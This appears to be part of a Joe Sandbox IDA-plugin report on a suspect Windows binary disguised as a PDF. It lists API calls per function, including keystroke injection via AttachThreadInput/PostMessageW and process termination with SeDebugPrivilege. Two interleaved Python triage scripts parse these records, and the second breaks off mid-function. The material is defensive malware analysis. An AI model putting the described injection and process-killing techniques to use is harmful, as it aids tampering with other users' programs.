                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 560350794-0
                                                                                                                      • Opcode ID: 9d28715d209556877ffb8717301ca7b5cdcae70afdfec746eff318d7865728ce
                                                                                                                      • Instruction ID: 7651111cc01aac059f46ec118eb4313b66be631b3fe3e69b9a4aa68ef64af868
                                                                                                                      • Opcode Fuzzy Hash: 9d28715d209556877ffb8717301ca7b5cdcae70afdfec746eff318d7865728ce
                                                                                                                      • Instruction Fuzzy Hash: 6BF12871A00209EFDB44DF94C888EAEB7B9FF49315F14805DFA16AB250DB35AE46CB50
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007CF9C9
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB5C
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB80
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBC0
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBE2
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007CFD5E
                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007CFD90
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007CFDBF
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007CFE36
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4090791747-0
                                                                                                                      • Opcode ID: 396e0668a58f3e8dfc75705ad3afe02fa2faca29374877a6e84e03153c45aca3
                                                                                                                      • Instruction ID: 95a25f251243c343316f0930913ed12e52de14568e8fc66f86df4eb18c0ff3f7
                                                                                                                      • Opcode Fuzzy Hash: 396e0668a58f3e8dfc75705ad3afe02fa2faca29374877a6e84e03153c45aca3
                                                                                                                      • Instruction Fuzzy Hash: ACE1C331204301DFCB14EF24C895F6ABBE1AF85354F14856DF89A8B2A2DB79EC45CB52
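The per-function API records in this report are the raw material for triage, and reading hundreds of them by hand is slow. The script below is an added example (editor's code, not part of the Joe Sandbox report, of its IDA plugin, or of the analysed sample) that parses records laid out as on this page, decodes the window-message and virtual-key constants that appear as hex arguments to SendMessageW/PostMessageW, and tags records an analyst should look at more closely. The sample text is constructed: its first record reproduces the CreateProcessW function above, its second is a keystroke-posting record in the same layout. The tag names and the rule set are the editor's choices, not Joe Sandbox signatures. One caveat the tags cannot express: when the binary is a script-runtime wrapper such as a compiled AutoIt executable, the runtime ships its own Run(), ControlSend() and FileMove() implementations whether or not the embedded script ever calls them, so a tag marks code that is present in the binary, not behaviour the script necessarily exercises.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' records and tag call patterns worth review.

Added example, not part of the report or of Joe Sandbox. SAMPLE is constructed
to mirror the report's layout; tag rules are the editor's own.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API call line, e.g.
#   • CreateProcessW.KERNEL32(00000000,?,00000000,...), ref: 007CFD5E
#   • _memset.LIBCMT ref: 007CF9C9
#   • Part of subcall function 007AAE57: AttachThreadInput.USER32(...), ref: 007AAE85
API_RE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# winuser.h constants needed to read the message arguments seen in these records.
WM_NAMES = {0x0031: "WM_GETFONT", 0x0080: "WM_SETICON", 0x00B1: "EM_SETSEL",
            0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0202: "WM_LBUTTONUP"}
VK_NAMES = {0x25: "VK_LEFT", 0x27: "VK_RIGHT"}
MESSAGE_APIS = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}
PROCESS_CREATION = {"CreateProcessW", "CreateProcessA", "CreateProcessAsUserW",
                    "ShellExecuteW", "ShellExecuteExW", "WinExec"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                 # int for hex literals, None where the plugin printed '?'
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when reported as 'Part of subcall function'


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    string_id: str = ""
    instruction_hash: str = ""


def _parse_args(raw):
    if raw is None:
        return []
    out = []
    for tok in raw.split(","):
        tok = tok.strip()
        if tok in ("", "?"):
            out.append(None)
        else:
            try:
                out.append(int(tok, 16))
            except ValueError:
                out.append(tok)  # the plugin occasionally prints a literal here
    return out


def parse_blocks(text):
    """Split report text into FunctionRecords, one per 'APIs' heading."""
    records, current, in_apis = [], None, False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = FunctionRecord()
            records.append(current)
            in_apis = True
            continue
        if current is None:
            continue
        if s in ("Strings", "Memory Dump Source"):
            in_apis = False          # API list ended; metadata follows
        elif in_apis:
            m = API_RE.match(line)
            if m:
                current.calls.append(ApiCall(
                    m["name"], m["module"], _parse_args(m["args"]), int(m["ref"], 16),
                    int(m["subfn"], 16) if m["subfn"] else None))
        elif s.startswith("• String ID:"):
            current.string_id = s.split(":", 1)[1].strip()
        elif s.startswith("• Instruction Fuzzy Hash:"):
            current.instruction_hash = s.split(":", 1)[1].strip()
    return records


def decode_message(call):
    """Render a Send/PostMessage call as e.g. 'WM_KEYDOWN VK_LEFT'; None for other APIs."""
    if call.name not in MESSAGE_APIS or len(call.args) < 2:
        return None
    msg = call.args[1]
    wparam = call.args[2] if len(call.args) > 2 else None
    if not isinstance(msg, int):
        return None
    text = WM_NAMES.get(msg, f"0x{msg:04X}")
    if msg in (0x0100, 0x0101) and isinstance(wparam, int):
        text += " " + VK_NAMES.get(wparam, f"VK_0x{wparam:02X}")
    return text


def flag(record):
    """Triage tags for one record (hints for review, not verdicts)."""
    names = {c.name for c in record.calls}
    tags = []
    if names & PROCESS_CREATION:
        tags.append("process-creation")
    key_msgs = [c for c in record.calls
                if (decode_message(c) or "").startswith("WM_KEY")]
    # Attaching input queues and then posting key events is how one process
    # types into another's window.
    if key_msgs and "AttachThreadInput" in names:
        tags.append("synthetic-keyboard-input")
    if names & {"MoveFileW", "MoveFileExW"}:
        tags.append("file-relocation")
    return tags


# Constructed sample in the report's layout: record 1 mirrors the CreateProcessW
# function above, record 2 is a keystroke-posting function.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 007CF9C9
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB5C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBC0
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007CFD5E
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007CFD90
• CloseHandle.KERNEL32(?), ref: 007CFDBF
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• String ID:
• Instruction Fuzzy Hash: ACE1C331204301DFCB14EF24C895F6ABBE1AF85354F14856DF89A8B2A2DB79EC45CB52
APIs
  • Part of subcall function 007AAE57: AttachThreadInput.USER32(00000000,?,007A9B65,?,00000001), ref: 007AAE85
• MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B70
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007A9B8D
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007A9BDA
Memory Dump Source
Similarity
• String ID:
"""


def triage(text):
    """One summary row per record: first call-site address, tags, decoded messages."""
    rows = []
    for rec in parse_blocks(text):
        rows.append({
            "first_ref": f"{rec.calls[0].ref:08X}" if rec.calls else None,
            "tags": flag(rec),
            "messages": [decode_message(c) for c in rec.calls if decode_message(c)],
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Running the block prints one summary row per record; on the constructed sample the first record is tagged `process-creation` and the second `synthetic-keyboard-input` with the posted keys decoded as `WM_KEYDOWN VK_LEFT` and `WM_KEYUP VK_RIGHT`. Feed it the text of a full report to get the same summary for every function, then sort by tag before reading the disassembly.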
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B38D3,?), ref: 007B48C7
                                                                                                                        • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B38D3,?), ref: 007B48E0
                                                                                                                        • Part of subcall function 007B4CD3: GetFileAttributesW.KERNEL32(?,007B3947), ref: 007B4CD4
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 007B4FE2
                                                                                                                      • _wcscmp.LIBCMT ref: 007B4FFC
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 007B5017
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 793581249-0
                                                                                                                      • Opcode ID: c9dbd2f23901a351d3c61536881376b0c8df8cf679bd0b2c8a523042816fae70
                                                                                                                      • Instruction ID: 59f7ccedfc79cf3987b540e47bb295b43ee488943b2f0976cf2a45c4635e5592
                                                                                                                      • Opcode Fuzzy Hash: c9dbd2f23901a351d3c61536881376b0c8df8cf679bd0b2c8a523042816fae70
                                                                                                                      • Instruction Fuzzy Hash: 365186B24087849BC724EB64D885ADFB7ECAF84341F00492EF589D7152EF78A18D8766
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007D896E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: 6d75aebe451c45b75a7826016816c310e3ef4f8faaba0b6c0df8d619bc9ffc7f
                                                                                                                      • Instruction ID: 92a0f989e55326e50c507e5eaa4cc6d51efd2456992d4328eff861f4339a175a
                                                                                                                      • Opcode Fuzzy Hash: 6d75aebe451c45b75a7826016816c310e3ef4f8faaba0b6c0df8d619bc9ffc7f
                                                                                                                      • Instruction Fuzzy Hash: 6F51A230600204FFDB609F28CC89BA93B75FB45320F648113F956E63A1DF79A9909B92
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0078C547
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078C569
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0078C581
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0078C59F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0078C5C0
                                                                                                                      • DestroyIcon.USER32(00000000), ref: 0078C5CF
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078C5EC
                                                                                                                      • DestroyIcon.USER32(?), ref: 0078C5FB
                                                                                                                        • Part of subcall function 007DA71E: DeleteObject.GDI32(00000000), ref: 007DA757
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2819616528-0
                                                                                                                      • Opcode ID: c402be2cf640f29418db656cfb6ba073267f6d503c676decb311343f6ebf3b86
                                                                                                                      • Instruction ID: 0ffc50ec059b8fc528871883727acca7bb0fd7260c2008899f02ed5f166c34b4
                                                                                                                      • Opcode Fuzzy Hash: c402be2cf640f29418db656cfb6ba073267f6d503c676decb311343f6ebf3b86
                                                                                                                      • Instruction Fuzzy Hash: 71517AB0640209EFDB24DF24CC45FAA3BB5FB45311F104529F942A72A1EBB8ED95DB60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007AAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AAE77
                                                                                                                        • Part of subcall function 007AAE57: GetCurrentThreadId.KERNEL32 ref: 007AAE7E
                                                                                                                        • Part of subcall function 007AAE57: AttachThreadInput.USER32(00000000,?,007A9B65,?,00000001), ref: 007AAE85
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B70
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007A9B8D
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007A9B90
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B99
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007A9BB7
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A9BBA
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9BC3
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007A9BDA
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A9BDD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: db53e7978a27044cd75304867fd63eb54462a26f1a22173dd16f1afae1d139e4
                                                                                                                      • Instruction ID: cf14262256795cfbc26b9c3e536398cbb2dee16b0485c6a34e9096fc22d74882
                                                                                                                      • Opcode Fuzzy Hash: db53e7978a27044cd75304867fd63eb54462a26f1a22173dd16f1afae1d139e4
                                                                                                                      • Instruction Fuzzy Hash: 9011E1B1650218FEF7106B60DC8EF6A3B2DEB4D751F104426F345AB0A0CAF75C10DAA8
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E0C
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E13
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007A8A84,00000B00,?,?), ref: 007A8E28
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E30
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E33
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007A8A84,00000B00,?,?), ref: 007A8E43
                                                                                                                      • GetCurrentProcess.KERNEL32(007A8A84,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E4B
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E4E
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,007A8E74,00000000,00000000,00000000), ref: 007A8E68
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: d797c4c8fd27bcffb0d9f5135285ba4885b1c7a83cbce60f204fded8424b1f78
                                                                                                                      • Instruction ID: 4d3a1f9d4833f3ad1ef1e2d454577f8feee2a6b9ad17df03bc9c6e8f4eed3535
                                                                                                                      • Opcode Fuzzy Hash: d797c4c8fd27bcffb0d9f5135285ba4885b1c7a83cbce60f204fded8424b1f78
                                                                                                                      • Instruction Fuzzy Hash: AB01BBB5241308FFE710ABA5DC4DF6B3BACEB89711F008421FA05DB1A1CA759C00CB24
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?,?,007A799D), ref: 007A766F
                                                                                                                        • Part of subcall function 007A7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A768A
                                                                                                                        • Part of subcall function 007A7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A7698
                                                                                                                        • Part of subcall function 007A7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?), ref: 007A76A8
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007C9B1B
                                                                                                                      • _memset.LIBCMT ref: 007C9B28
                                                                                                                      • _memset.LIBCMT ref: 007C9C6B
                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007C9C97
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 007C9CA2
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 007C9CF0
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                      • Opcode ID: a099d458a48cf0221a854e756097f0f6aabde73108c4fc9e4dee7fdbcc01ec74
                                                                                                                      • Instruction ID: 11cf7c340a08cadf78de06e255d629d7909b8e2f2b03c11f0cc924e052387613
                                                                                                                      • Opcode Fuzzy Hash: a099d458a48cf0221a854e756097f0f6aabde73108c4fc9e4dee7fdbcc01ec74
                                                                                                                      • Instruction Fuzzy Hash: 27911871D00219EBDB10DFA5DC89EDEBBB9BF08710F20815AF519A7281DB759A44CFA0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007D7093
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 007D70A7
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007D70C1
                                                                                                                      • _wcscat.LIBCMT ref: 007D711C
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 007D7133
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007D7161
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                      • String ID: SysListView32
                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                      • Opcode ID: 5fa5cc19705083172405ae135bdb3a584c4563caa515ede8ecd05e0ae8b71f23
                                                                                                                      • Instruction ID: e1a1b8febd07dfd430ddc021cc273436b2fb8604b5e4a26a1576fa6abc93b40f
                                                                                                                      • Opcode Fuzzy Hash: 5fa5cc19705083172405ae135bdb3a584c4563caa515ede8ecd05e0ae8b71f23
                                                                                                                      • Instruction Fuzzy Hash: 3C417071904308EBDB259F64CC85BEA77B8EF08350F10452BF555E62D2E67A9D84CB60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007B3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 007B3EB6
                                                                                                                        • Part of subcall function 007B3E91: Process32FirstW.KERNEL32(00000000,?), ref: 007B3EC4
                                                                                                                        • Part of subcall function 007B3E91: CloseHandle.KERNEL32(00000000), ref: 007B3F8E
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECB8
                                                                                                                      • GetLastError.KERNEL32 ref: 007CECCB
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECFA
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 007CED77
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 007CED82
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 007CEDB7
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      • Opcode ID: cbe4c839b404e7b7dfa207aeae4fabd15ea4c3759b37895b27eae22499e5cdbe
                                                                                                                      • Instruction ID: 530e7338f64ff1dce40fe98f2507a27f0ebbe1195ba453226dbb0f74713289fd
                                                                                                                      • Opcode Fuzzy Hash: cbe4c839b404e7b7dfa207aeae4fabd15ea4c3759b37895b27eae22499e5cdbe
                                                                                                                      • Instruction Fuzzy Hash: 15416B71200201DFDB14EF24CC99FAEB7A5AF81714F18845DF9439B2D2DBB9A904CB96
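Two of the function records above are the ones a triage analyst stops on: the routine at 007A9B70 (AttachThreadInput, then MapVirtualKeyW and PostMessageW with message 0x100/0x101 and virtual-key 0x25/0x27, i.e. WM_KEYDOWN/WM_KEYUP for VK_LEFT/VK_RIGHT) and the routine at 007CECB8 (CreateToolhelp32Snapshot, OpenProcess, TerminateProcess with the string SeDebugPrivilege). The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: a parser for the "APIs" / "String ID" lines in the layout shown on this page that groups calls per function, decodes the window-message constants, and flags those two behaviours. The embedded listing is a constructed, abbreviated excerpt in that layout; the regexes and the small VK table are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed, abbreviated excerpt in the layout of the listing above (sample
# text built for this example, not copied from the report).
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 007AAE57: AttachThreadInput.USER32(00000000,?,007A9B65,?,00000001), ref: 007AAE85
• MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B70
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007A9B8D
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007A9BB7
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007A9BDA
APIs
  • Part of subcall function 007B3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 007B3EB6
  • Part of subcall function 007B3E91: Process32FirstW.KERNEL32(00000000,?), ref: 007B3EC4
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECB8
• TerminateProcess.KERNEL32(00000000,00000000), ref: 007CED77
• CloseHandle.KERNEL32(00000000), ref: 007CEDB7
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
"""

# One "• Name.MODULE(args), ref: ADDR" line; args and the subcall prefix are optional.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)")
STRING_ID_RE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)")
WM_KEYDOWN, WM_KEYUP = 0x100, 0x101
VK_NAMES = {0x09: "VK_TAB", 0x0D: "VK_RETURN", 0x20: "VK_SPACE", 0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}

@dataclass
class Call:
    name: str
    module: str
    args: List[Optional[int]]      # hex literals as ints; '?' (unresolved by the plugin) as None
    ref: str
    subcall_of: Optional[str] = None

@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    def has(self, *names):
        present = {c.name for c in self.calls}
        return all(n in present for n in names)

def parse_args(raw):
    """'00000001,?,-C0000018' -> [1, None, -0xC0000018]; None or empty -> []."""
    if not raw:
        return []
    out = []
    for a in raw.split(","):
        try:
            out.append(int(a.strip(), 16))
        except ValueError:
            out.append(None)
    return out

def parse_records(text):
    """Split a listing into per-function records; each 'APIs' header starts a new one."""
    records = []
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            records.append(Record())
        elif records and (m := API_RE.search(s)):
            records[-1].calls.append(Call(m["name"], m["mod"], parse_args(m["args"]), m["ref"], m["sub"]))
        elif records and (m := STRING_ID_RE.match(s)):
            records[-1].strings.extend(p for p in m["ids"].split("$") if p)
    return records

def decode_keystrokes(rec):
    """Read PostMessageW/SendMessageW(hwnd, msg, wParam, lParam) calls as key events."""
    events = []
    for c in rec.calls:
        if c.name in ("PostMessageW", "SendMessageW") and len(c.args) >= 3:
            msg, vk = c.args[1], c.args[2]
            if msg in (WM_KEYDOWN, WM_KEYUP) and vk is not None:
                kind = "WM_KEYDOWN" if msg == WM_KEYDOWN else "WM_KEYUP"
                events.append(kind + " " + VK_NAMES.get(vk, "VK_0x%02X" % vk))
    return events

def triage(records):
    """Return (record index, finding) pairs for behaviour worth a closer look."""
    findings = []
    for i, rec in enumerate(records):
        keys = decode_keystrokes(rec)
        if rec.has("AttachThreadInput") and keys:
            findings.append((i, "posts synthetic key events into another thread's window: " + ", ".join(keys)))
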